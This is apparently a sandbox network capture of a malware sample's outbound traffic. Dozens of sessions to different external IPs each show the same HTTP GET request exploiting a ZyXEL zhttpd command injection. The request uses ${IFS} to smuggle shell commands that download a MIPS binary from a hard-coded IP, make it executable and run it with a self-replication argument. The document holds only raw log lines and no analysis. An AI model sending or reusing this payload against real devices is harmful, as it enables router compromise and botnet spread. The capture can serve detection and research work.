                                            Jan 14, 2024 15:50:28.228276014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1182192.168.2.233846236.12.194.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228296041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1183192.168.2.2359850169.27.33.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228343964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1184192.168.2.2353924174.198.240.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228367090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1185192.168.2.23523562.131.28.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228388071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1186192.168.2.234459676.131.17.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228408098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1187192.168.2.2346068177.130.229.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228431940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1188192.168.2.2339100139.206.59.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228502035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1189192.168.2.2338192157.220.93.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228518963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1190192.168.2.235762252.18.39.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228545904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1191192.168.2.233691823.166.20.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228569984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1192192.168.2.2335626137.88.116.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228625059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1193192.168.2.2333106208.82.113.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228647947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1194192.168.2.234879087.186.9.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228662968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1195192.168.2.23520245.232.138.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228708982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1196192.168.2.2360394121.129.204.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228734016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1197192.168.2.2345246185.161.102.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228775024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1198192.168.2.234166494.76.166.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228809118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1199192.168.2.2345730126.6.120.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228827953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1200192.168.2.233314679.7.51.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228869915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1201192.168.2.2343952104.5.50.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228895903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1202192.168.2.234679064.178.142.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228919029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1203192.168.2.234477437.15.148.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.228950024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1204192.168.2.234019619.228.46.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229011059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1205192.168.2.235556869.235.58.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229012966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1206192.168.2.2352732203.17.87.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229038954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1207192.168.2.2357758171.25.108.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229070902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1208192.168.2.23576404.166.110.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229103088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1209192.168.2.235104442.22.231.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229120016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1210192.168.2.235668081.59.88.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229165077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1211192.168.2.235733070.9.45.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229185104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1212192.168.2.2343614166.230.19.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229202986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1213192.168.2.2351460105.102.105.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229258060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1214192.168.2.23418561.140.74.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229290009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1215192.168.2.233660095.12.250.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229300976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1216192.168.2.2348698164.59.193.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229348898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1217192.168.2.2334652156.59.18.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229379892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1218192.168.2.2347476130.100.99.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229392052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1219192.168.2.2333866130.55.206.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229424953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1220192.168.2.2339058112.13.213.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229460955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1221192.168.2.235673876.219.84.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229510069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1222192.168.2.2342372201.44.153.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229532957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1223192.168.2.236066423.49.142.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229532957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1224192.168.2.2356514142.66.252.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229578018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1225192.168.2.235140849.11.182.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229619026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1226192.168.2.2333746135.181.178.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229631901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1227192.168.2.235636299.191.219.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229651928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1228192.168.2.2343130176.45.193.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229693890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1229192.168.2.234016625.31.26.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229741096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1230192.168.2.2354246158.153.85.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229759932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1231192.168.2.235090437.20.51.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229779005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1232192.168.2.2348324202.46.185.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229798079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1233192.168.2.2355270158.59.161.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229840040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1234192.168.2.233780842.84.213.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229861021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1235192.168.2.2345466168.24.46.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229893923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1236192.168.2.2342530174.21.82.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229911089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1237192.168.2.2350556222.127.254.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.229945898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1238192.168.2.2344876221.8.140.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230003119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1239192.168.2.23331008.115.214.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230010986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1240192.168.2.235454099.191.232.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230050087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1241192.168.2.2352390131.200.1.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230082989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1242192.168.2.23342788.249.74.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230145931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1243192.168.2.235861838.138.89.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230165958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1244192.168.2.2345022133.201.103.12443
                                            TimestampBytes transferredDirectionData
